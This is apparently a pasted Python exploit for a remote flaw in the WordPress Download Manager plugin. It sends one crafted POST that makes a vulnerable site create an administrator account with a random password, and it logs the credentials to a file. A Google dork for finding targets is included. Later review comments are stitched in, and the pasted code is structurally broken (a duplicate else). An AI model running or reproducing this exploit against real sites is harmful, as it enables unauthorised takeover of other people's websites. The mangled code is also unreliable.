Googleinurl

[EXPLOIT] Wordpress Download Manager R3m0t3 C0d3 Ex3cu

Dec 14th, 2014
  1. #!/usr/bin/python
  2. # Exploit Name: Wordpress Download Manager 2.7.0-2.7.4 Remote Command Execution
  3. # Vulnerability discovered by SUCURI TEAM (http://blog.sucuri.net/2014/12/security-advisory-high-severity-wordpress-download-manager.html)
  4. # Exploit written by Claudio Viviani  - http://www.homelab.it / Edited INURL - BRASIL
  5. # 2014-12-03:  Discovered vulnerability
  6. # 2014-12-04:  Patch released (2.7.5)
  7. # Video Demo: https://www.youtube.com/watch?v=rIhF03ixXFk
  8. # Dork google:  index of "wordpress-download"
  9.  
  10. import urllib, urllib2, socket
  11. import sys
  12. import string, random
  13. import optparse
  14. import datetime
  15. import os
  16.  
  17. # Check url
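def checkurl(url):
    """Return *url* unchanged when it starts with an explicit web scheme, else exit.

    Only ``http://`` and ``https://`` are accepted, because the request built
    later in the script hands the string straight to urllib2. Any other prefix
    prints an error and terminates the process with status 1.

    Args:
        url: target address as given on the command line.

    Returns:
        The same string, when it carries an accepted scheme.

    Raises:
        SystemExit: when the scheme is missing or not http/https.
    """
    # Case-sensitive prefix test, same as the original slice comparisons.
    if not url.startswith(("http://", "https://")):
        # Error text corrected ("procotol" -> "protocol").
        print('[X] You must insert http:// or https:// protocol')
        sys.exit(1)
    return url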
  24.  
  25. # Check if file exists and has readable
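def checkfile(file):
    """Return *file* when it is an existing, readable regular file, else exit.

    Args:
        file: path to check (parameter name kept for compatibility; it
            shadows the Python 2 builtin).

    Returns:
        The same path string, when both checks pass.

    Raises:
        SystemExit: when the path is not a regular file or is not readable.
    """
    # Either failing check is fatal. The original joined them with ``and``,
    # which let an existing-but-unreadable file through.
    if not os.path.isfile(file) or not os.access(file, os.R_OK):
        now = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")
        # print() form so the module parses on Python 3 as well.
        print("0x" + now + "[INFO][ERROR]: " + file + " file is missing or not readable")
        sys.exit(1)
    return file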
  33.  
def id_generator(size=6, chars=string.ascii_uppercase + string.ascii_lowercase + string.digits):
    """Build a string of *size* characters, each drawn at random from *chars*.

    Defaults to six ASCII letters/digits. The script uses this for both the
    username and the password it mints, but it relies on the ``random``
    module, which is a PRNG, not a CSPRNG — NOTE(review): anything that must
    be unguessable should come from ``secrets`` instead.
    """
    picked = []
    for _ in range(size):
        # One random.choice per position, in order, exactly as before.
        picked.append(random.choice(chars))
    return ''.join(picked)
  36.  
# Banner printed before any action (and with the usage text on bad args).
banner = """
0x[EXPLOIT NAME]: Wordpress Download Manager R3m0t3 C0d3 Ex3cut10n / INURL - BRASIL
------------------------------------------------------------------------------------------------------------------
"""

# Command-line interface: one target URL plus an optional socket timeout (seconds).
commandList = optparse.OptionParser('usage: %prog -t URL [--timeout sec]')
commandList.add_option('-t', '--target', action="store",
                  help="Insert TARGET URL: http[s]://www.victim.com[:PORT]",
                  )
commandList.add_option('--timeout', action="store", default=10, type="int",
                  help="[Timeout Value] - Default 10",
                  )

# ``remainder`` (positional leftovers) is never used.
options, remainder = commandList.parse_args()

# Check args
if not options.target:
    print(banner)
    commandList.print_help()
    sys.exit(1)

# checkurl() exits unless the target carries an http:// or https:// scheme.
host = checkurl(options.target)
timeout = options.timeout

print(banner)

# Applies to every socket urllib2 opens below.
socket.setdefaulttimeout(timeout)

# Random 6-character username and password (random module, not secrets).
username = id_generator()
pwd = id_generator()

# Form body of the single POST made below; the plugin's ajax handler is asked
# to run wp_insert_user with these fields.
body = urllib.urlencode({'action' : 'wpdm_ajax_call',
                         'execute' : 'wp_insert_user',
                         'user_login' : username,
                         'user_pass' : pwd,
                         'role' : 'administrator'})

# Fixed browser-like User-Agent; nothing else is set on the request.
headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'}
# Timestamp taken once here; the except handlers at the bottom reuse it, so
# their log lines carry the pre-request time, not the failure time.
now = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")
# Python 2 print statement: together with urllib/urllib2 this makes the
# script Python 2 only.
print "0x" + str(now) + "[INFO]: Tryng to connect to: "+host
try:
    # Single POST to the site root (host + "/").
    req = urllib2.Request(host+"/", body, headers)
    response = urllib2.urlopen(req)
    html = response.read()

    # NOTE(review): an empty response body is the only success signal checked;
    # nothing about the returned content is verified.
    if html == "":
       now = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")
       print("0x" + str(now) + "[INFO][VALUE]: Account Added")
       now = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")
       print("0x" + str(now) + "[INFO][VALUE]: Location: "+host+"/wp-login.php")
       now = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")
       print("0x" + str(now) + "[INFO][VALUE]: Username: "+username)
       now = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")
       print("0x" + str(now) + "[INFO][VALUE]: Password: "+pwd)


       # Output file in the current working directory; the record written to
       # it holds host, username and password in plaintext.
       file_saved = 'Wordpress_Download_Manager_R3m0t3_C0d3_Ex3cut10n.txt'

       msg = '0x[INFO][FILE SAVED]: '+file_saved + "\n"
       # No separator between the username and "PWD::" in this line.
       url_saved = "HOST:: "+host+" USER:: "+username+"PWD:: "+pwd+"\n"
    # NOTE(review): this ``if`` sits at the level of ``if html == ""``, not
    # inside it, so on a non-empty response ``file_saved``/``url_saved`` are
    # unbound (NameError). Both branches do the same work; open(..., 'a')
    # alone would create a missing file.
    if os.path.exists(file_saved):
       arquivo = open(file_saved, 'a')
       arquivo.write(url_saved)
       arquivo.close()
       print(msg)
    else:
       arquivo = open(file_saved, 'w')
       arquivo.write(url_saved)
       arquivo.close()
       print(msg)

    # NOTE(review): second ``else:`` for the same ``if`` — as pasted this
    # block is a SyntaxError; it was presumably meant to pair with
    # ``if html == ""`` above.
    else:
       now = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")
       print("0x" + str(now) + "[INFO][FAIL]:  Exploitation Failed :(")

# HTTPError is a URLError subclass, so it must be listed first (it is).
except urllib2.HTTPError as e:
    print("0x" + str(now) + "[INFO][ERROR]:  "+str(e))
except urllib2.URLError as e:
    print("0x" + str(now) + "[INFO][ERROR]:  Connection Error: "+str(e))